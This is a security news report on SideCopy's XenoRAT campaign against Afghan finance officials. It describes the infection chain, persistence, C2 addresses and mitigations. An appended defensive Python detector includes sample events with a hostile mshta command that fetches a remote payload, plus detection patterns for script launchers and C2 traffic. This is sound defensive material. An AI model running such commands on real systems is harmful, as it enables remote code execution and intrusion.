
SideCopy Hackers Deploy Persistent XenoRAT Malware to Target Afghanistan Finance Ministry

Jun 01, 2026

A Pakistan-linked threat group known as SideCopy has launched a focused cyberattack against Afghanistan’s Ministry of Finance, deploying a persistent remote access tool called XenoRAT.

The campaign, dubbed Operation XENOFISCAL, targeted provincial finance officials across all 34 Afghan Mustoufiats — regional revenue and finance directorates that form the fiscal backbone of the country.

The attack began with a spear phishing email carrying a ZIP archive. Inside was a malicious shortcut file disguised with a PDF icon and a filename written in Pashto — the dominant language used by Afghan government workers.

The lure posed as a list of employees invited to a seminar on psychological and intellectual warfare, showing that the attackers had precise knowledge of their targets’ working environment.

Analysts from Seqrite, in a report shared with Cyber Security News, identified this campaign and attributed it to the SideCopy APT cluster with medium-to-high confidence.

SideCopy operates under the umbrella of the broader Transparent Tribe group (also known as APT36), which has a documented history of targeting South Asian government institutions.

Seqrite Labs has been tracking this threat cluster for years as part of its global spear phishing monitoring program.

Once the victim opened the shortcut file, the malware silently used mshta.exe — a legitimate Windows utility — to reach out to a compromised Afghan education domain and pull a remote payload.

This technique is called Living-off-the-Land, where attackers abuse built-in system tools to avoid triggering security alerts. The malware then decoded obfuscated JavaScript in memory and embedded itself in the Windows Registry, disguising its persistence entry as a Microsoft Edge process.

Infection Chain (Source - Seqrite)

The final stage deployed XenoRAT 1.8.7, an open-source Remote Access Trojan available on GitHub, which established an encrypted connection to a bulletproof server in Frankfurt, Germany.

This command-and-control infrastructure was entirely separate from the delivery domain — a deliberate design to ensure long-term access even if the delivery layer was discovered and shut down.

SideCopy Hackers Deploy Persistent XenoRAT Malware

The malware chain ran across five stages, each built to pass control to the next without triggering detection. After the shortcut file launched mshta.exe, it pulled an HTML Application payload from abimj.edu.af, a compromised Afghan education website.

That payload contained obfuscated JavaScript which decoded itself in memory and dropped a .NET-based loader DLL to continue the infection.

A legitimate Microsoft binary (Source - Seqrite)

That loader DLL downloaded an encoded, GZIP-compressed blob from attacker-controlled URLs and unpacked it entirely in memory.

The shellcode that followed used reflective loading — allocating executable memory and injecting itself without writing the main payload to disk. This fileless approach makes the malware far harder to catch with conventional antivirus scanning.

XenoRAT is a capable surveillance tool once active. It connects to a hard-coded IP address using encrypted TCP traffic and registers itself through both a Windows Scheduled Task named “XenoUpdateManager” and a Registry Run key.

The malware creates a mutex named “clouda” to prevent duplicate instances, and it enumerates installed antivirus products before reporting back to its operators.

Persistence Mechanisms and Infrastructure Exposure

The decoy document dropped during execution was a real Afghan Ministry of Finance internal staff directory, listing Finance Directors, Revenue Chiefs, and Secretaries from all 34 provinces — complete with mobile numbers.

This level of detail indicates the attackers conducted prior intelligence gathering, likely through earlier compromises of Afghan government networks.

The delivery domain abimj.edu.af resolved to IPs 103.132.98.224 and 103.132.98.226, both on a subnet belonging to Afghanistan’s own Ministry of Communication.

Shellcode Execution (Source - Seqrite)

Staging malicious payloads on local Afghan infrastructure allowed traffic to blend with legitimate government communications, bypassing network monitoring tools.

The RAT’s C2 server at 185.235.137.106 was hosted on AS59711, a Bulgaria-registered provider with Frankfurt data center presence previously linked to SideCopy activity.

Security teams should monitor for unusual mshta.exe executions, unexpected Registry Run keys mimicking Windows processes, and outbound traffic to unrecognized European hosting providers.

Enforcing application allow-listing, auditing scheduled tasks regularly, and restricting HTA execution from public directories are effective mitigations. Seqrite released detections under signatures including Link.Downloader.50744.GC and Script.Netloader.50745.GC to help identify compromised systems.
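Added here as an illustration, not part of the article or of Seqrite's report: a small Python triage routine that applies the monitoring advice above to Sysmon-style events. The field names, the sample events, the file names in them and the Edge-lookalike heuristic are the editor's assumptions; the C2 IP, the delivery domain and the scheduled-task name are the ones quoted in the article.

```python
import re
from difflib import SequenceMatcher

# Indicators quoted in the article above (Seqrite's report); everything else here is constructed.
KNOWN_C2_IPS = {"185.235.137.106"}
KNOWN_DELIVERY_DOMAINS = {"abimj.edu.af"}
KNOWN_TASK_NAMES = {"xenoupdatemanager"}
URL_RE = re.compile(r"https?://([^/\s\"']+)", re.IGNORECASE)
LEGIT_EDGE_PATH = "\\microsoft\\edge\\application\\msedge.exe"

def looks_like_edge(value_name: str) -> bool:
    """Heuristic (editor's assumption): a Run value named 'Edge' or a near-misspelling of it."""
    n = value_name.lower()
    return "edge" in n or max(SequenceMatcher(None, n, ref).ratio() for ref in ("edge", "msedge")) >= 0.75

def classify(event: dict) -> list[str]:
    """Return the detection names this Sysmon-like event triggers; [] means nothing matched."""
    hits = []
    image, cmd = event.get("Image", "").lower(), event.get("CommandLine", "")
    m = URL_RE.search(cmd)
    if image.endswith("\\mshta.exe") and m:                      # stage 1: mshta fetching a remote HTA
        hits.append("mshta-remote-hta")
        if m.group(1).lower() in KNOWN_DELIVERY_DOMAINS:
            hits.append("known-delivery-domain")
    if image.endswith("\\schtasks.exe") and any(t in cmd.lower() for t in KNOWN_TASK_NAMES):
        hits.append("xenorat-scheduled-task")
    target = event.get("TargetObject", "")
    if "\\currentversion\\run\\" in target.lower():                # Run-key persistence write
        value_name, data = target.rsplit("\\", 1)[-1], event.get("Details", "").lower()
        if looks_like_edge(value_name) and LEGIT_EDGE_PATH not in data:
            hits.append("run-key-edge-masquerade")
        if any(x in data for x in ("\\users\\public\\", ".hta", ".bat", "mshta")):
            hits.append("run-key-script-launcher")
    if event.get("DestinationIp") in KNOWN_C2_IPS:               # outbound to the reported C2
        hits.append("xenorat-c2")
    return hits

# Constructed sample events with Sysmon-style field names (not telemetry from the incident).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "CommandLine": "mshta http://abimj.edu.af/index.php"},
    {"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Edgre",
     "Details": r"C:\Users\Public\update.bat"},
    {"TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch",
     "Details": r'"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window'},
    {"Image": r"C:\Windows\System32\schtasks.exe", "CommandLine": '/Create /TN "XenoUpdateManager" /SC ONLOGON'},
    {"Image": r"C:\Users\Public\svc.exe", "DestinationIp": "185.235.137.106"},
    {"Image": r"C:\Windows\System32\notepad.exe", "CommandLine": r"notepad C:\Users\u\notes.txt"},
]

def scan(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Run classify() over a batch and keep only the events that triggered something."""
    return [(i, h) for i, e in enumerate(events) if (h := classify(e))]

if __name__ == "__main__":
    for i, h in scan(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(h)}")
```

The legitimate Edge autostart entry (event 2) is deliberately included to show that the masquerade rule keys on where the value points, not just on the name.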

Indicators of Compromise (IoCs):


Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.

Source: CybersecurityNews.com
